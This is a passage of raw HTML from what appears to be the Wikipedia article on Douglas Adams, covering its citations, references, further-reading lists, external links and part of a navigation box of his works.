href=\"http://www.independent.co.uk/arts-entertainment/books/reviews/the-salmon-of-doubt-by-douglas-adams-650803.html\">\"The Salmon of Doubt by Douglas Adams\"</a>. <i>The Independent</i>. London<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">2 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=The+Salmon+of+Doubt+by+Douglas+Adams&rft.aufirst=Charles+Shaar&rft.aulast=Murray&rft.date=2002-05-10&rft.genre=article&rft_id=http%3A%2F%2Fwww.independent.co.uk%2Farts-entertainment%2Fbooks%2Freviews%2Fthe-salmon-of-doubt-by-douglas-adams-650803.html&rft.jtitle=The+Independent&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-66\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-66\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">The Literator (5 January 2002). <a rel=\"nofollow\" class=\"external text\" href=\"https://web.archive.org/web/20090801062359/http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\">\"Cover Stories: Douglas Adams, Narnia Chronicles, Something like a House\"</a>. <i>The Independent</i>. London. Archived from <a rel=\"nofollow\" class=\"external text\" href=\"http://www.independent.co.uk/arts-entertainment/books/features/cover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html\">the original</a> on 1 August 2009<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">2 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Cover+Stories%3A+Douglas+Adams%2C+Narnia+Chronicles%2C+Something+like+a+House&rft.au=The+Literator&rft.date=2002-01-05&rft.genre=article&rft_id=http%3A%2F%2Fwww.independent.co.uk%2Farts-entertainment%2Fbooks%2Ffeatures%2Fcover-stories-douglas-adams-narnia-chronicles-something-like-a-house-672250.html&rft.jtitle=The+Independent&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-67\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-67\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.dirkmaggs.dswilliams.co.uk/Dirk%20Maggs%20News%20%20new%20projects.htm\">\"Dirk Maggs News and New Projects page\"</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Dirk+Maggs+News+and+New+Projects+page&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.dirkmaggs.dswilliams.co.uk%2FDirk%2520Maggs%2520News%2520%2520new%2520projects.htm&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span><sup class=\"noprint Inline-Template\"><span style=\"white-space: nowrap;\">[<i><a href=\"/wiki/Wikipedia:Link_rot\" title=\"Wikipedia:Link rot\"><span title=\" Dead link since June 2016\">dead link</span></a></i>]</span></sup></span></li>\n<li id=\"cite_note-68\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-68\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\">Matthew Hemley (5 May 2009). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.thestage.co.uk/news/newsstory.php/24312/douglas-adams-final-dirk-gently-novel-to-be\">\"The Stage / News / Douglas Adams's final Dirk Gently novel to be adapted for Radio 4\"</a>. <i>The Stage</i><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">20 August</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=The+Stage+%2F+News+%2F+Douglas+Adams%27s+final+Dirk+Gently+novel+to+be+adapted+for+Radio+4&rft.au=Matthew+Hemley&rft.date=2009-05-05&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.thestage.co.uk%2Fnews%2Fnewsstory.php%2F24312%2Fdouglas-adams-final-dirk-gently-novel-to-be&rft.jtitle=The+Stage&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-69\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-69\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.chortle.co.uk/news/2009/10/11/9767/bbc_plans_dirk_gently_tv_series\">\"BBC plans Dirk Gently TV series\"</a>. Chortle.co.uk. 11 October 2009<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 October</span> 2009</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=BBC+plans+Dirk+Gently+TV+series&rft.date=2009-10-11&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.chortle.co.uk%2Fnews%2F2009%2F10%2F11%2F9767%2Fbbc_plans_dirk_gently_tv_series&rft.pub=Chortle.co.uk&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-GoogleDoodle2013a-70\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-GoogleDoodle2013a_70-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\"><a rel=\"nofollow\" class=\"external text\" href=\"http://abcnews.go.com/blogs/technology/2013/03/dont-panic-google-doodle-honors-author-douglas-adams/\">\"Don't Panic! Google Doodle Honors Author Douglas Adams\"</a>. <i>abc News</i>. 11 March 2013<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Don%27t+Panic%21+Google+Doodle+Honors+Author+Douglas+Adams&rft.date=2013-03-11&rft.genre=article&rft_id=http%3A%2F%2Fabcnews.go.com%2Fblogs%2Ftechnology%2F2013%2F03%2Fdont-panic-google-doodle-honors-author-douglas-adams%2F&rft.jtitle=abc+News&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-71\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-71\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.google.com/doodles/douglas-adams-61st-birthday\">\"Douglas Adams' 61st Birthday\"</a><span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">11 March</span> 2013</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.btitle=Douglas+Adams%27+61st+Birthday&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.google.com%2Fdoodles%2Fdouglas-adams-61st-birthday&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n</ol>\n</div>\n<h2><span class=\"mw-headline\" id=\"References\">References</span></h2>\n<ul>\n<li>Adams, Douglas (1998). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.biota.org/people/douglasadams/\">Is there an Artificial God?</a>, speech at <i>Digital Biota 2</i>, Cambridge, England, September 1998.</li>\n<li><cite id=\"CITEREFAdams2002\" class=\"citation book\">Adams, Douglas (2002). <i>The Salmon of Doubt: Hitchhiking the Galaxy One Last Time</i>. London: Macmillan. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/0-333-76657-1\" title=\"Special:BookSources/0-333-76657-1\">0-333-76657-1</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=Douglas&rft.aulast=Adams&rft.btitle=The+Salmon+of+Doubt%3A+Hitchhiking+the+Galaxy+One+Last+Time&rft.date=2002&rft.genre=book&rft.isbn=0-333-76657-1&rft.place=London&rft.pub=Macmillan&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></li>\n<li>Dawkins, Richard (2003). \"Eulogy for Douglas Adams,\" in <i>A devil's chaplain: reflections on hope, lies, science, and love</i>. Houghton Mifflin Harcourt.</li>\n<li>Felch, Laura (2004). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.bookslut.com/nonfiction/2004_05_002057.php\">Don't Panic: Douglas Adams and the Hitchhiker's Guide to the Galaxy by Neil Gaiman</a>, May 2004</li>\n<li>Ray, Mohit K (2007). <i>Atlantic Companion to Literature in English</i>, Atlantic Publishers and Distributors. <a href=\"/wiki/Special:BookSources/8126908327\" class=\"internal mw-magiclink-isbn\">ISBN 81-269-0832-7</a></li>\n<li><cite id=\"CITEREFSimpson2003\" class=\"citation book\">Simpson, M. J. (2003). <i><a href=\"/w/index.php?title=Hitchhiker:_A_Biography_of_Douglas_Adams&action=edit&redlink=1\" class=\"new\" title=\"Hitchhiker: A Biography of Douglas Adams (page does not exist)\">Hitchhiker: A Biography of Douglas Adams</a></i> (1st ed.). Boston, Mass.: Justin, Charles & Co. <a href=\"/wiki/International_Standard_Book_Number\" title=\"International Standard Book Number\">ISBN</a> <a href=\"/wiki/Special:BookSources/1-932112-17-0\" title=\"Special:BookSources/1-932112-17-0\">1-932112-17-0</a>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.aufirst=M.+J.&rft.aulast=Simpson&rft.btitle=Hitchhiker%3A+A+Biography+of+Douglas+Adams&rft.date=2003&rft.edition=1st&rft.genre=book&rft.isbn=1-932112-17-0&rft.place=Boston%2C+Mass.&rft.pub=Justin%2C+Charles+%26+Co&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></li>\n<li>Webb, Nick (2005a). <i>Wish You Were Here: The Official Biography of Douglas Adams</i>. Ballantine Books. <a href=\"/wiki/Special:BookSources/0345476506\" class=\"internal mw-magiclink-isbn\">ISBN 0-345-47650-6</a></li>\n<li>Webb, Nick (2005b). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.oxforddnb.com/view/article/75853\">\"Adams, Douglas Noël (1952–2001)\"</a>, <i>Oxford Dictionary of National Biography</i>, Oxford University Press, January 2005. Retrieved 25 October 2005.</li>\n</ul>\n<h2><span class=\"mw-headline\" id=\"Further_reading\">Further reading</span></h2>\n<h3><span class=\"mw-headline\" id=\"Articles\">Articles</span></h3>\n<div class=\"refbegin columns references-column-width\" style=\"-moz-column-width: 30em; -webkit-column-width: 30em; column-width: 30em;\">\n<ul>\n<li>Herbert, R. (1980). The Hitchhiker's Guide to the Galaxy (Book Review). Library Journal, 105(16), 1982.</li>\n<li>Adams, J., & Brown, R. (1981). The Hitchhiker's Guide to the Galaxy (Book Review). School Library Journal, 27(5), 74.</li>\n<li>Nickerson, S. L. (1982). The Restaurant at the End of the Universe (Book). Library Journal, 107(4), 476.</li>\n<li>Nickerson, S. L. (1982). Life, the Universe, and Everything (Book). Library Journal, 107(18), 2007.</li>\n<li>Morner, C. (1982). The Restaurant at the End of the Universe (Book Review). School Library Journal, 28(8), 87.</li>\n<li>Morner, C. (1983). Life, the Universe and Everything (Book Review). School Library Journal, 29(6), 93.</li>\n<li>Shorb, B. (1985). So Long, and Thanks for All the Fish (Book). School Library Journal, 31(6), 90.</li>\n<li>The Long Dark Tea-Time of the Soul (Book). (1989). Atlantic (02769077), 263(4), 99.</li>\n<li>Hoffert, B., & Quinn, J. (1990). Last Chance To See (Book). Library Journal, 115(16), 77.</li>\n<li>Reed, S. S., & Cook, I. I. (1991). Dances with kakapos. People, 35(19), 79.</li>\n<li>Last Chance to See (Book). (1991). Science News, 139(8), 126.</li>\n<li>Field, M. M., & Steinberg, S. S. (1991). Douglas Adams. Publishers Weekly, 238(6), 62.</li>\n<li>Dieter, W. (1991). Last Chance to See (Book). Smithsonian, 22(3), 140.</li>\n<li>Dykhuis, R. (1991). Last Chance To See (Book). Library Journal, 116(1), 140.</li>\n<li>Beatty, J. (1991). Good Show (Book). Atlantic (02769077), 267(3), 131.</li>\n<li>A guide to the future. (1992). Maclean's, 106(44), 51.</li>\n<li>Zinsser, J. (1993). Audio reviews: Fiction. Publishers Weekly, 240(9), 24.</li>\n<li>Taylor, B., & Annichiarico, M. (1993). Audio reviews. Library Journal, 118(2), 132.</li>\n<li>Good reads. (1995). NetGuide, 2(4), 109.</li>\n<li>Stone, B. (1998). The unsinkable starship. Newsweek, 131(15), 78.</li>\n<li>Gaslin, G. (2001). Galaxy Quest. Entertainment Weekly, (599), 79.</li>\n<li>So long, and thanks for all the fish. (2001). Economist, 359(8222), 79.</li>\n<li>Geier, T., & Raftery, B. M. (2001). Legacy. Entertainment Weekly, (597), 11.</li>\n<li>Passages. (2001). Maclean's, 114(21), 13.</li>\n<li>Don't panic! Douglas Adams to keynote Embedded show. (2001). Embedded Systems Programming, 14(3), 10.</li>\n<li>Ehrenman, G. (2001). World Wide Weird. InternetWeek, (862), 15.</li>\n<li>Zaleski, J. (2002). The Salmon of Doubt (Book). Publishers Weekly, 249(15), 43.</li>\n<li>Mort, J. (2002). The Salmon of Doubt (Book). Booklist, 98(16), 1386.</li>\n<li>Lewis, D. L. (2002). Last Time Round The Galaxy. Quadrant Magazine, 46(9), 84.</li>\n<li>Burns, A. (2002). The Salmon of Doubt (Book). Library Journal, 127(15), 111.</li>\n<li>Burns, A., & Rhodes, B. (2002). The Restaurant at the End of the Universe (Book). Library Journal, 127(19), 118.</li>\n<li>Kaveney, R. (2002). A cheerful whale. TLS, (5173), 23.</li>\n<li>Pearl, N., & Welch, R. (2003). The Hitchhiker's Guide To The Galaxy (Book). Library Journal, 128(11), 124.</li>\n<li>Preying on composite materials. (2003). R&D Magazine, 45(6), 44.</li>\n<li>Webb, N. (2003). The Berkeley Hotel hostage. Bookseller, (5069), 25.</li>\n<li>The author who toured the universe. (2003). Bookseller, (5060), 35.</li>\n<li>Osmond, A. (2005). Only human. Sight & Sound, 15(5), 12–15.</li>\n<li>Culture vulture. (2005). Times Educational Supplement, (4640), 19.</li>\n<li>Maughan, S. (2005). Audio Bestsellers/Fiction. Publishers Weekly, 252(30), 17.</li>\n<li>Hitchhiker At The Science Museum. (2005). In Britain, 14(10), 9.</li>\n<li>Rea, A. (2005). The Adams asteroids. New Scientist, 185(2488), 31.</li>\n<li>Most Improbable Adventure. (2005). Popular Mechanics, 182(5), 32.</li>\n<li>The Hitchhiker's Guide To The Galaxy: The Tertiary Phase. (2005). Publishers Weekly, 252(14), 21.</li>\n<li>Bartelt, K. R. (2005). Wish You Were Here: The Official Biography of Douglas Adams. Library Journal, 130(4), 86.</li>\n<li>Larsen, D. (2005). I was a teenage android. New Zealand Listener, 198(3390), 37–38.</li>\n<li>Tanner, J. C. (2005). Simplicity: it's hard. Telecom Asia, 16(6), 6.</li>\n<li>Nielsen Bookscan Charts. (2005). Bookseller, (5175), 18–21.</li>\n<li>Buena Vista launches regional site to push Hitchhiker's movie. (2005). New Media Age, 9.</li>\n<li>Shynola bring Beckland to life. (2005). Creative Review, 25(3), 24–26.</li>\n<li>Carwardine, M. (15 September 2007). The baiji: So long and thanks for all the fish. New Scientist. pp. 50–53.</li>\n<li>Czarniawska, B. (2008). Accounting and gender across times and places: An excursion into fiction. Accounting, Organizations & Society, 33(1), 33–47.</li>\n<li>Pope, M. (2008). Life, the Universe, Religion and Science. Issues, (82), 31–34.</li>\n<li>Bearne, S. (2008). BBC builds site to trail Last Chance To See TV series. New Media Age, 08.</li>\n<li>Arrow to reissue Adams. (2008). Bookseller, (5352), 14.</li>\n<li>Page, B. (2008). Colfer is new Hitchhiker. Bookseller, (5350), 7.</li>\n<li>I've got a perfect puzzle for you. (2009). Bookseller, (5404), 42.</li>\n<li>Mostly Harmless.... (2009). Bookseller, (5374), 46.</li>\n<li>Penguin and PanMac hitch a ride together. (2009). Bookseller, (5373), 6.</li>\n<li>Adams, Douglas. Britannica Biographies [serial online]. October 2010;:1</li>\n<li>Douglas (Noël) Adams (1952–2001). Hutchinson's Biography Database [serial online]. July 2011;:1</li>\n<li>My life in books. (2011). Times Educational Supplement, (4940), 27.</li>\n</ul>\n</div>\n<h3><span class=\"mw-headline\" id=\"Other\">Other</span></h3>\n<ul>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"https://web.archive.org/web/20110720193159/http://www.douglasadams.com/\">Adams's official web site</a> at the <a href=\"/wiki/Wayback_Machine\" title=\"Wayback Machine\">Wayback Machine</a> (archived 20 July 2011), established by him, and still operated by <a href=\"/wiki/The_Digital_Village\" title=\"The Digital Village\">The Digital Village</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"https://www.ted.com/speakers/douglas_adams\">Douglas Adams</a> at <a href=\"/wiki/TED_(conference)\" title=\"TED (conference)\">TED</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.biota.org/people/douglasadams/\">Douglas Adams speech at Digital Biota 2 (1998)</a> <a rel=\"nofollow\" class=\"external text\" href=\"http://www.biota.org/podcast/#DNA\">(The audio of the speech)</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.guardian.co.uk/books/2008/jun/09/douglasadams\">Guardian Books \"Author Page\"</a>, with profile and links to further articles.</li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"//worldcat.org/identities/lccn-n80-76765\">Works by or about Douglas Adams</a> in libraries (<a href=\"/wiki/WorldCat\" title=\"WorldCat\">WorldCat</a> catalog)</li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.vintagemacworld.com/iifx.html\">Douglas Adams & his Computer</a> article about his Mac IIfx</li>\n<li>BBC2 \"Omnibus\" tribute to Adams, presented by Kirsty Wark, 4 August 2001</li>\n<li>Mueller, Rick and Greengrass, Joel (2002). <i>Life, The Universe and Douglas Adams</i>, documentary.</li>\n<li>Simpson, M.J. (2001). <i>The Pocket Essential Hitchhiker's Guide</i>. <a href=\"/wiki/Special:BookSources/1903047404\" class=\"internal mw-magiclink-isbn\">ISBN 1-903047-40-4</a>. Updated April 2005 <a href=\"/wiki/Special:BookSources/1904048463\" class=\"internal mw-magiclink-isbn\">ISBN 1-904048-46-3</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.bbc.co.uk/programmes/p00fpvbm\">Special edition of BBC Book Club featuring Douglas Adams</a>, first broadcast 2 January 2000 on BBC Radio 4</li>\n</ul>\n<h2><span class=\"mw-headline\" id=\"External_links\">External links</span></h2>\n<table class=\"vertical-navbox nowraplinks infobox\" style=\"float:right;clear:right;width:auto;margin:0 0 1.0em 1.0em;background:#f9f9f9;border:1px solid #aaa;padding:0.2em;border-spacing:0.4em 0;text-align:center;line-height:1.4em;font-size:88%\">\n<tr>\n<td style=\"padding-top:0.4em;line-height:1.2em\"><a href=\"/wiki/Wikipedia:LIBRARY\" class=\"mw-redirect\" title=\"Wikipedia:LIBRARY\">Library resources</a> about<br />\n<b>Douglas Adams</b>\n<hr /></td>\n</tr>\n<tr>\n<td class=\"plainlist\" style=\"padding:0 0.1em 0.4em;text-align:left;\">\n<ul>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?st=viaf&su=113230702\">Resources in your library</a></li>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?st=viaf&su=113230702&library=0CHOOSE0\">Resources in other libraries</a></li>\n</ul>\n</td>\n</tr>\n<tr>\n<th style=\"padding:0.1em\">By Douglas Adams</th>\n</tr>\n<tr>\n<td class=\"plainlist\" style=\"padding:0 0.1em 0.4em;text-align:left;\">\n<ul>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?at=viaf&au=113230702\">Resources in your library</a></li>\n<li><a class=\"external text\" href=\"//tools.wmflabs.org/ftl/cgi-bin/ftl?at=viaf&au=113230702&library=0CHOOSE0\">Resources in other libraries</a></li>\n</ul>\n</td>\n</tr>\n</table>\n<div id=\"section_SpokenWikipedia\" class=\"infobox sisterproject noprint\">\n<div style=\"text-align: center;\"><b>Listen to this article (2 parts) </b>· <a href=\"/wiki/File:Douglas_Adams_Part_1.ogg\" title=\"File:Douglas Adams Part 1.ogg\">(info)</a></div>\n<div style=\"text-align: center; font-size: 90%; margin-bottom: .4em;\"><i><a href=\"//upload.wikimedia.org/wikipedia/commons/4/4a/Douglas_Adams_Part_1.ogg\" class=\"internal\" title=\"Douglas Adams Part 1.ogg\">Part 1</a> • <a href=\"//upload.wikimedia.org/wikipedia/commons/c/c6/Douglas_Adams_Part_2.ogg\" class=\"internal\" title=\"Douglas Adams Part 2.ogg\">Part 2</a></i></div>\n<div style=\"float: left; margin-left: 5px;\">\n<div class=\"floatnone\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/4/47/Sound-icon.svg/45px-Sound-icon.svg.png\" title=\"Spoken Wikipedia\" width=\"45\" height=\"34\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/4/47/Sound-icon.svg/68px-Sound-icon.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/4/47/Sound-icon.svg/90px-Sound-icon.svg.png 2x\" data-file-width=\"128\" data-file-height=\"96\" /></div>\n</div>\n<div style=\"font-size: xx-small; line-height: 1.6em; margin-left: 60px;\">This audio file was created from a revision of the \"<span class=\"fn\">Douglas Adams</span>\" article dated 2006-02-11, and does not reflect subsequent edits to the article. (<a href=\"/wiki/Wikipedia:Media_help\" title=\"Wikipedia:Media help\">Audio help</a>)</div>\n<div style=\"text-align: center; clear: both\"><b><a href=\"/wiki/Wikipedia:Spoken_articles\" title=\"Wikipedia:Spoken articles\">More spoken articles</a></b></div>\n</div>\n<ul>\n<li><a href=\"/wiki/File:Commons-logo.svg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/12px-Commons-logo.svg.png\" width=\"12\" height=\"16\" class=\"noviewer\" srcset=\"//upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/18px-Commons-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/24px-Commons-logo.svg.png 2x\" data-file-width=\"1024\" data-file-height=\"1376\" /></a> Media related to <a href=\"https://commons.wikimedia.org/wiki/Category:Douglas_Adams\" class=\"extiw\" title=\"commons:Category:Douglas Adams\">Douglas Adams</a> at Wikimedia Commons</li>\n<li><a href=\"/wiki/File:Wikiquote-logo.svg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/13px-Wikiquote-logo.svg.png\" width=\"13\" height=\"16\" class=\"noviewer\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/20px-Wikiquote-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikiquote-logo.svg/27px-Wikiquote-logo.svg.png 2x\" data-file-width=\"300\" data-file-height=\"355\" /></a> Quotations related to <a href=\"https://en.wikiquote.org/wiki/Special:Search/Douglas_Adams\" class=\"extiw\" title=\"wikiquote:Special:Search/Douglas Adams\">Douglas Adams</a> at Wikiquote</li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"https://www.findagrave.com/cgi-bin/fg.cgi?page=gr&GRid=22814\">Douglas Adams</a> at <i><a href=\"/wiki/Find_a_Grave\" title=\"Find a Grave\">Find a Grave</a></i></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://www.imdb.com/name/nm0010930/\">Douglas Adams</a> at the <a href=\"/wiki/IMDb\" title=\"IMDb\">Internet Movie Database</a></li>\n<li><a rel=\"nofollow\" class=\"external text\" href=\"http://towelday.org/\">Towel Day, 25 May</a></li>\n</ul>\n<table class=\"wikitable succession-box\" style=\"margin:0.5em auto; font-size:95%;clear:both;\">\n<tr style=\"text-align:center;\">\n<td style=\"width:30%;\" rowspan=\"1\">Preceded by<br />\n<span style=\"font-weight: bold\"><a href=\"/wiki/Anthony_Read\" title=\"Anthony Read\">Anthony Read</a></span></td>\n<td style=\"width: 40%; text-align: center;\" rowspan=\"1\"><b><i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i> script editor</b><br />\n1979–80</td>\n<td style=\"width: 30%; text-align: center;\" rowspan=\"1\">Succeeded by<br />\n<span style=\"font-weight: bold\"><a href=\"/wiki/Christopher_H._Bidmead\" title=\"Christopher H. Bidmead\">Christopher H. Bidmead</a></span></td>\n</tr>\n</table>\n<div role=\"navigation\" class=\"navbox\" aria-labelledby=\"Works_by_Douglas_Adams\" style=\"padding:3px\">\n<table class=\"nowraplinks collapsible autocollapse navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"col\" class=\"navbox-title\" colspan=\"2\">\n<div class=\"plainlinks hlist navbar mini\">\n<ul>\n<li class=\"nv-view\"><a href=\"/wiki/Template:Douglas_Adams\" title=\"Template:Douglas Adams\"><abbr title=\"View this template\" style=\";;background:none transparent;border:none;\">v</abbr></a></li>\n<li class=\"nv-talk\"><a href=\"/wiki/Template_talk:Douglas_Adams\" title=\"Template talk:Douglas Adams\"><abbr title=\"Discuss this template\" style=\";;background:none transparent;border:none;\">t</abbr></a></li>\n<li class=\"nv-edit\"><a class=\"external text\" href=\"//en.wikipedia.org/w/index.php?title=Template:Douglas_Adams&action=edit\"><abbr title=\"Edit this template\" style=\";;background:none transparent;border:none;\">e</abbr></a></li>\n</ul>\n</div>\n<div id=\"Works_by_Douglas_Adams\" style=\"font-size:114%\">Works by <strong class=\"selflink\">Douglas Adams</strong></div>\n</th>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Novels</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(novel)\" title=\"The Hitchhiker's Guide to the Galaxy (novel)\">The Hitchhiker's Guide to the Galaxy</a></i></li>\n<li><i><a href=\"/wiki/The_Restaurant_at_the_End_of_the_Universe\" title=\"The Restaurant at the End of the Universe\">The Restaurant at the End of the Universe</a></i></li>\n<li><i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i></li>\n<li><i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i></li>\n<li><i><a href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i></li>\n<li><i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i></li>\n<li><i><a href=\"/wiki/Mostly_Harmless\" title=\"Mostly Harmless\">Mostly Harmless</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Short stories</th>\n<td class=\"navbox-list navbox-even hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li>\"<a href=\"/wiki/The_Private_Life_of_Genghis_Khan\" title=\"The Private Life of Genghis Khan\">The Private Life of Genghis Khan</a>\"</li>\n<li>\"<a href=\"/wiki/Young_Zaphod_Plays_It_Safe\" title=\"Young Zaphod Plays It Safe\">Young Zaphod Plays It Safe</a>\"</li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\">Books</th>\n<td class=\"navbox-list navbox-odd hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i></li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts</a></i></li>\n<li><i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i></li>\n<li><i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i></li>\n<li><i><a 